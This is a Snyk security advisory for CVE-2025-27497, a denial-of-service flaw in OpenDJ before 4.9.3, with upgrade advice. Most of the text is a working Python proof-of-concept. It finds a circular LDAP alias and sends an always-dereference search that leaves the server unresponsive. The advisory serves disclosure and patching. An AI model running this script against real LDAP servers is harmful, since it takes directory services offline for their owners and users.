Infinite loop Affecting org.openidentityplatform.opendj:opendj-server-legacy package, versions [,4.9.3)
Threat Intelligence
Exploit Maturity
Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
Proof of Concept
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk IDSNYK-JAVA-ORGOPENIDENTITYPLATFORMOPENDJ-9296373
- published6 Mar 2025
- disclosed5 Mar 2025
- credithannes96
Introduced: 5 Mar 2025
NewCVE-2025-27497 (opens in a new tab)Common Vulnerabilities and Exposures (CVE) are common identifiers for publicly known security vulnerabilities
Common Weakness Enumeration (CWE) is a category system for software weaknesses
How to fix?
Upgrade org.openidentityplatform.opendj:opendj-server-legacy to version 4.9.3 or higher.
Overview
Affected versions of this package are vulnerable to Infinite loop. An attacker can cause the server to become unresponsive to all LDAP requests without crashing or restarting by executing a crafted ldapsearch request with alias dereferencing set to "always" on an alias loop entry.
PoC
import argparse
from ldap3 import Server, Connection, ALL, DEREF_NEVER, DEREF_ALWAYS
from ldap3.core.exceptions import LDAPBindError, LDAPSocketOpenError
def connect_to_ldap(ip, port):
try:
server = Server(ip, port, get_info=ALL)
connection = Connection(server, auto_bind=True)
return connection
except (LDAPBindError, LDAPSocketOpenError) as e:
print(f"Error connecting to LDAP server: {e}")
return None
def find_aliases(connection, base_dn):
try:
search_filter = "(objectClass=alias)"
connection.search(base_dn, search_filter=search_filter, dereference_aliases=DEREF_NEVER, attributes=["*"])
except Exception as e:
print(f"Error during search: {e}")
aliases = {}
for entry in connection.entries:
entry_dn = entry.entry_dn
entry_alias = entry.aliasedObjectName.value
aliases[entry_dn] = entry_alias
return aliases
def detect_alias_loop(aliases):
visited = set()
path = set()
def dfs(alias):
if alias in path:
return alias
if alias in visited:
return None
path.add(alias)
visited.add(alias)
aliased_target = aliases.get(alias)
if aliased_target:
result = dfs(aliased_target)
if result:
return result
path.remove(alias)
return None
for alias in aliases:
if alias not in visited:
loop_alias = dfs(alias)
if loop_alias:
return loop_alias
return None
def execute_dos_search(connection, looping_alias_dn):
try:
search_filter = "(objectClass=*)"
connection.search(looping_alias_dn, search_filter=search_filter, dereference_aliases=DEREF_ALWAYS)
except Exception as e:
print(f"Error during search: {e}")
for entry in connection.entries:
entry_dn = entry.entry_dn
print(entry_dn)
def main():
parser = argparse.ArgumentParser(description="Search LDAP for circular alias references.")
parser.add_argument("ip", type=str, nargs="?", default=None, help="The IP address of the LDAP server.")
parser.add_argument("port", type=int, nargs="?", default=None, help="The port of the LDAP server.")
parser.add_argument("base", type=str, nargs="?", default=None, help="The base DN of the LDAP server.")
args = parser.parse_args()
if not args.ip:
args.ip = input("Please enter the IP address of the LDAP server: ")
if not args.port:
while True:
try:
port_input = input("Please enter the port of the LDAP server: ")
args.port = int(port_input)
break
except ValueError:
print("Invalid input. Please enter a valid integer for the port.")
if not args.base:
args.base = input("Please enter the base DN of the LDAP server: ")
connection = connect_to_ldap(args.ip, args.port)
if connection:
aliases = find_aliases(connection, args.base)
looping_alias_dn = detect_alias_loop(aliases)
if looping_alias_dn:
execute_dos_search(connection, looping_alias_dn)
print(f"DOS executed with alias: {looping_alias_dn}")
else:
print("No looping alias DN found!")
connection.unbind()
if __name__ == "__main__":
main()